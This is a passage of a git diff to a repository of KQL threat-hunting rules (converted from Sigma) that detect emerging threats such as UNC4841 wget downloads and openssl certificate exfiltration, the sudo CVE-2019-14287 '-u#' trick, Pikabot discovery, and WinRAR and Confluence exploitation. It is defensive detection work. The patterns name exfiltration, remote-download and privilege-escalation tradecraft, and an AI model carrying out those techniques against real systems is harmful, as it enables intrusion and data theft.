Malware File Indicator Creation +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql index 6875eeb3..6bf7a8d0 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql @@ -1,10 +1,10 @@ -// Title: Sofacy Trojan Loader Activity -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2018-03-01 -// Level: high -// Description: Detects Trojan loader activity as used by APT28 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats - -DeviceProcessEvents +// Title: Sofacy Trojan Loader Activity +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-01 +// Level: high +// Description: Detects Trojan loader activity as used by APT28 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql index 9e9357af..3d48787e 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql @@ -1,12 +1,12 @@ -// Title: Sudo Privilege Escalation CVE-2019-14287 -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-15 -// Level: high -// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Sudo Privilege Escalation CVE-2019-14287 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-15 +// Level: high +// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " -u#" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql index 0f6551fa..84638fb0 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql @@ -1,12 +1,12 @@ -// Title: Suspicious RazerInstaller Explorer Subprocess -// Author: Florian Roth (Nextron Systems), Maxime Thiebaut -// Date: 2021-08-23 -// Level: high -// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats -// False Positives: -// - User selecting a different installation folder (check for other sub processes of this explorer.exe process) - -DeviceProcessEvents +// Title: Suspicious RazerInstaller Explorer Subprocess +// Author: Florian Roth (Nextron Systems), Maxime Thiebaut +// Date: 2021-08-23 +// Level: high +// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats +// False Positives: +// - User selecting a different installation folder (check for other sub processes of this explorer.exe process) + +DeviceProcessEvents | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql index 5624c144..442fa855 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) -// Author: Sittikorn S -// Date: 2020-05-31 -// Level: medium -// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats - -DeviceRegistryEvents +// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) +// Author: Sittikorn S +// Date: 2020-05-31 +// Level: medium +// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql index 2ba11c77..29eea50f 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql @@ -1,10 +1,10 @@ -// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: high -// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats - -DeviceProcessEvents +// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql index efd5b053..0c885527 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql @@ -1,10 +1,10 @@ -// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: high -// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats - -DeviceProcessEvents +// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254."))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql index 2e8e2ebb..1b1c2190 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql @@ -1,10 +1,10 @@ -// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: high -// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats - -DeviceProcessEvents +// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql index ae88791b..abe5ceb6 100644 --- a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql +++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential Pikabot Discovery Activity -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-10-27 -// Level: high -// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. -// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Pikabot Discovery Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. +// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql index 8f185e95..634c1049 100644 --- a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql +++ b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql @@ -1,10 +1,10 @@ -// Title: Adwind RAT / JRAT -// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community -// Date: 2017-11-10 -// Level: high -// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats - -DeviceProcessEvents +// Title: Adwind RAT / JRAT +// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +// Date: 2017-11-10 +// Level: high +// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql index 4e802ac4..5a41e6a4 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql @@ -1,10 +1,10 @@ -// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-06-29 -// Level: critical -// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats - -DeviceFileEvents +// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-29 +// Level: critical +// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents | where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql index c2d2c1bb..21bdb334 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql @@ -1,12 +1,12 @@ -// Title: CVE-2021-26858 Exchange Exploitation -// Author: Bhabesh Raj -// Date: 2021-03-03 -// Level: high -// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for -// creation of non-standard files on disk by Exchange Server’s Unified Messaging service -// which could indicate dropping web shells or other malicious content -// MITRE Tactic: Execution -// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats - -DeviceFileEvents +// Title: CVE-2021-26858 Exchange Exploitation +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for +// creation of non-standard files on disk by Exchange Server’s Unified Messaging service +// which could indicate dropping web shells or other malicious content +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql index c3adf9a9..3fd6bd5a 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql @@ -1,12 +1,12 @@ -// Title: CVE-2021-44077 POC Default Dropped File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-06 -// Level: high -// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2021-44077, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: CVE-2021-44077 POC Default Dropped File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2021-44077, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql index 43867a5b..997cc9fa 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql @@ -1,10 +1,10 @@ -// Title: CVE-2022-24527 Microsoft Connected Cache LPE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-13 -// Level: high -// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache -// MITRE Tactic: Execution -// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats - -DeviceFileEvents +// Title: CVE-2022-24527 Microsoft Connected Cache LPE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-13 +// Level: high +// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats + +DeviceFileEvents | where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql index 1c519e6b..83901817 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql @@ -1,12 +1,12 @@ -// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-11-14 -// Level: high -// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-11-14 +// Level: high +// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql index 6153f5d8..b6ff4139 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql @@ -1,10 +1,10 @@ -// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-11-14 -// Level: medium -// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats - -DeviceProcessEvents +// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-11-14 +// Level: medium +// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql index 6e14b751..cbc6e8f2 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql @@ -1,10 +1,10 @@ -// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-30 -// Level: high -// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2023-38331, detection.emerging-threats - -DeviceFileEvents +// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-30 +// Level: high +// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-38331, detection.emerging-threats + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\." \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql index 58192dc0..894b4988 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql @@ -1,12 +1,12 @@ -// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process -// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io) -// Date: 2023-08-30 -// Level: high -// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. -// MITRE Tactic: Execution -// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process +// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io) +// Date: 2023-08-30 +// Level: high +// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +// MITRE Tactic: Execution +// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql index 9c44e5c4..2bec633b 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql @@ -1,12 +1,12 @@ -// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-31 -// Level: low -// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2023-40477, detection.emerging-threats -// False Positives: -// - Legitimate extraction of multipart or recovery volumes ZIP files - -DeviceFileEvents +// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: low +// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-40477, detection.emerging-threats +// False Positives: +// - Legitimate extraction of multipart or recovery volumes ZIP files + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql index 